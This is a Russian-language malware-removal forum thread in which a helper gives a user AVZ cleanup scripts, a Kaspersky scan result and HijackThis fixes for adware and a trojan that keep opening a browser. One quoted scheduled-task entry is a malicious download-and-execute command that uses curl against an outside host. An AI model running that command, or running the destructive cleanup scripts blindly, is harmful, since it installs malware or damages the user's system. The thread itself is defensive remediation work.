kulin 0 Опубликовано 15 июля, 2017 Share Опубликовано 15 июля, 2017 Здравствуйте. Периодически запускается Google Chrome с сайтом. Сканировал несколькими утилитами ничего не помогло. Спасибо за помощь. Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 15 июля, 2017 Share Опубликовано 15 июля, 2017 Порядок оформления запроса о помощи Цитата Ссылка на сообщение Поделиться на другие сайты
kulin 0 Опубликовано 15 июля, 2017 Автор Share Опубликовано 15 июля, 2017 Файл не загрузился с первого раза. CollectionLog-2017.07.15-13.21.zip Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 15 июля, 2017 Share Опубликовано 15 июля, 2017 c:\users\user\appdata\local\yc\application\yc.exe Это браузер вам знаком? Здравствуйте! - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); ClearQuarantineEx(true); QuarantineFile('C:\Users\User\AppData\Roaming\Microsoft\msi.exe', ''); QuarantineFile('C:\Users\User\Favorites\Links\Интернет.url', ''); QuarantineFileF('C:\Program Files (x86)\YiuAskIE\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0); QuarantineFileF('C:\Users\User\AppData\Roaming\curl\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0); DeleteFile('C:\Users\User\AppData\Roaming\Microsoft\msi.exe', '32'); DeleteFile('C:\Users\User\Favorites\Links\Интернет.url'); ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "2C6A44CB-AD42-4731-A544-3FBD3D83AB5B" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "2C6A44CB-AD42-4731-A544-3FBD3D83AB5B2" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "setupsk" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "setupsk_upd" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "{865447F4-F175-44DC-977C-487DEF38AE59}" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "{EF30BB43-1CD0-4EB5-BEED-B1745248C496}" /F', 0, 15000, true); DeleteFileMask('C:\Program Files (x86)\YiuAskIE\', '*', true); DeleteFileMask('C:\Users\User\AppData\Roaming\curl\', '*', true); DeleteDirectory('C:\Users\User\AppData\Roaming\curl\'); DeleteDirectory('C:\Program Files (x86)\YiuAskIE\'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'hjdqsamhxh'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end. После выполнения скрипта компьютер перезагрузится. - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com Полученный ответ сообщите здесь (с указанием номера KLAN) Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger. Скачайте AdwCleaner и сохраните его на Рабочем столе. Запустите его (в ОС Vista/Windows 7/8 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования. Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[s0].txt. Прикрепите отчет к своему следующему сообщению. Цитата Ссылка на сообщение Поделиться на другие сайты
kulin 0 Опубликовано 15 июля, 2017 Автор Share Опубликовано 15 июля, 2017 (изменено) ответ ЛК: KLAN-6529590962Thank you for contacting Kaspersky LabThe files have been scanned in automatic mode.Malicious code has been detected in the following files:msi.exe - Trojan.Win32.Loskad.fnrNo information about the specified files can be found in the antivirus databases:Интернет.urlks5GN.dllktr9tIj.dllt9WlcCyc.dllKernel.jsbackground.jsforeground.jsproxy.jsmessages.jsonmessages_0.jsonmessages_1.jsonmessages_2.jsonmessages_3.jsonmessages_4.jsonmessages_5.jsonmessages_6.jsonmessages_7.jsonmessages_8.jsonmessages_9.jsonmessages_10.jsonmessages_11.jsonmessages_12.jsonmessages_13.jsonmessages_14.jsonmessages_15.jsonmessages_16.jsonmessages_17.jsonmessages_18.jsonmessages_19.jsonmessages_20.jsonmessages_21.jsonmessages_22.jsonmessages_23.jsonmessages_24.jsonmessages_25.jsonmessages_26.jsonmessages_27.jsonmessages_28.jsonmessages_29.jsonmessages_30.jsonmessages_31.jsonmessages_32.jsonmessages_33.jsonmessages_34.jsonmessages_35.jsonmessages_36.jsonmessages_37.jsonmessages_38.jsonmessages_39.jsonmessages_40.jsonmessages_41.jsonmessages_42.jsonmessages_43.jsonmessages_44.jsonmessages_45.jsonmessages_46.jsonmessages_47.jsonmessages_48.jsonmessages_49.jsonmessages_50.jsonmessages_51.jsonmessages_52.jsonmessages_53.jsonmessages_54.jsonmessages_55.jsonmessages_56.jsoncurl_7_54.exeAdware application designed to display ads was detected in the following files:mNu8OfaUM.exe - not-a-virus:AdWare.Win32.Neoreklami.fsmWe will thoroughly analyze the files you sent. If the result of the analysis is different from this automatic scan result, you will be notified via email.This is an automatically generated message. Please do not reply to it.Anti-Virus Lab, Kaspersky Lab HQ"39A/3 Leningradskoe Shosse, Moscow, 125212, RussiaTel./Fax: + 7 (495) 797 8700http://www.kaspersky.comhttp://www.viruslist.com" Изменено 15 июля, 2017 пользователем regist спрятал под спойлер Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 15 июля, 2017 Share Опубликовано 15 июля, 2017 жду логи. Цитата Ссылка на сообщение Поделиться на другие сайты
kulin 0 Опубликовано 24 июля, 2017 Автор Share Опубликовано 24 июля, 2017 Логи. CollectionLog-2017.07.24-20.48.zip AdwCleanerS0.txt Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 24 июля, 2017 Share Опубликовано 24 июля, 2017 Здравствуйте!Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); ClearQuarantineEx(true); TerminateProcessByName('C:\Windows\System32\icacl.exe'); TerminateProcessByName('c:\users\user\appdata\local\yc\application\yc.exe'); StopService('icacl'); QuarantineFile('C:\Windows\System32\icacl.exe', ''); QuarantineFile('c:\users\user\appdata\local\yc\application\yc.exe', ''); QuarantineFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\chrome_elf.dll', ''); QuarantineFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\chrome.dll', ''); QuarantineFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\chrome_child.dll', ''); QuarantineFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\libglesv2.dll', ''); QuarantineFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\libegl.dll', ''); QuarantineFile('C:\Users\User\AppData\Roaming\curl\curl.exe', ''); QuarantineFile('C:\Users\User\AppData\Roaming\curl\curl_7_54.exe', ''); QuarantineFile('C:\Users\User\AppData\Roaming\Microsoft\msi.exe', ''); QuarantineFileF('c:\users\user\appdata\local\yc', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 , 0); QuarantineFileF('c:\users\user\appdata\roaming\curl', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 , 0); DeleteFile('C:\Windows\System32\icacl.exe', '32'); DeleteFile('c:\users\user\appdata\local\yc\application\yc.exe', '32'); DeleteFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\chrome_elf.dll', '32'); DeleteFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\chrome.dll', '32'); DeleteFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\chrome_child.dll', '32'); DeleteFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\libglesv2.dll', '32'); DeleteFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\libegl.dll', '32'); DeleteFile('C:\Users\User\AppData\Roaming\curl\curl.exe', '32'); DeleteFile('C:\Users\User\AppData\Roaming\curl\curl_7_54.exe', '32'); DeleteFile('C:\Users\User\AppData\Roaming\Microsoft\msi.exe', '32'); ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true); DeleteService('icacl'); DeleteFileMask('c:\users\user\appdata\local\yc', '*', true); DeleteFileMask('c:\users\user\appdata\roaming\curl', '*', true); DeleteDirectory('c:\users\user\appdata\roaming\curl'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'ycAutoLaunch_E945EC6410C7CE86DF55E29C29AFA8B8'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end. - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.comПолученный ответ сообщите здесь (с указанием номера KLAN) "Пофиксите" в HijackThis (некоторые строки могут отсутствовать): O2 - BHO: YoutubeAdBlock - {2C6A44CB-AD42-4731-A544-3FBD3D83AB5B} - C:\Program Files (x86)\YiuAskIE\t9WlcCyc.dll (file missing) O2-32 - BHO: YoutubeAdBlock - {2C6A44CB-AD42-4731-A544-3FBD3D83AB5B} - C:\Program Files (x86)\YiuAskIE\ktr9tIj.dll (file missing) O4 - HKCU\..\Run: [ycAutoLaunch_E945EC6410C7CE86DF55E29C29AFA8B8] C:\Users\User\AppData\Local\yc\Application\yc.exe /prefetch:5 O22 - Task (Ready): MSI - C:\Users\User\AppData\Roaming\Microsoft\msi.exe cnt=3 fts="ФИЛЬМЫ\last_day_on_earth_survival_v1_4_2_mod___.exe" (file missing) O22 - Task (Ready): U2_2C6A44CB-AD42-4731-A544-3FBD3D83AB5B - C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\YiuAskU2\EUJHowC.dll",#1 O22 - Task (Ready): curl - C:\Users\User\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\User\AppData\Roaming\curl\curl.exe" (file missing) O22 - Task (Ready): curls - C:\Users\User\AppData\Roaming\curl\curl.exe (file missing) Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger. Цитата Ссылка на сообщение Поделиться на другие сайты
kulin 0 Опубликовано 26 июля, 2017 Автор Share Опубликовано 26 июля, 2017 (изменено) Файл quarantine.zip получился размером 48 мб. Не получается его отправить. Пофиксил в HijackThis. Прикрепил лог. CollectionLog-2017.07.25-21.10.zip Изменено 26 июля, 2017 пользователем kulin Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 26 июля, 2017 Share Опубликовано 26 июля, 2017 Файл quarantine.zip получился размером 48 мб. Не получается его отправить. закачайте архив на любой файлообменник, не требующий ввода капчи (например: Zippyshare, My-Files.RU, File.Karelia) ссылку на скачивание пришлите мне в ЛС. Выполните скрипт в АВЗ (Файл - Выполнить скрипт): var PathAutoLogger, CMDLine : string; begin clearlog; PathAutoLogger := Copy(GetAVZDirectory, 0, (Length(GetAVZDirectory)-4)); AddToLog('start time ' + FormatDateTime('yyyy.mm.dd-hh:mm:ss', now)+#13#10+ PathAutoLogger); SaveLog(PathAutoLogger+'report3.log'); if FolderIsEmpty(PathAutoLogger+'CrashDumps') then CMDLine := 'a "' + PathAutoLogger + 'Report.7z" "' + PathAutoLogger + '\report*.log" "' + PathAutoLogger + 'HiJackThis\HiJackThis*.log"' else CMDLine := 'a "' + PathAutoLogger + 'Report.7z" "' + PathAutoLogger + '\report*.log" "' + PathAutoLogger + 'CrashDumps\"'; ExecuteFile('7za.exe', CMDLine, 0, 180000, false); AddLineToTxtFile(PathAutoLogger+'report3.log', '7z ReturnCode ' + IntToStr(GetLastExitCode)+#13#10+'end time ' + FormatDateTime('yyyy.mm.dd-hh:mm:ss', now)); end. архив Report.zip из папки с AutoLogger, пожалуйста, прикрепите к своему сообщению. Выполнение скрипта может занять несколько минут. Если архив слишком большой, загрузите его на файлообменник, например на один из этих файлообменников http://rghost.ru/, http://www.zippyshare.com/ , http://my-files.ru/ , http://www.ge.tt/ и дайте на него ссылку в Вашей теме. Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.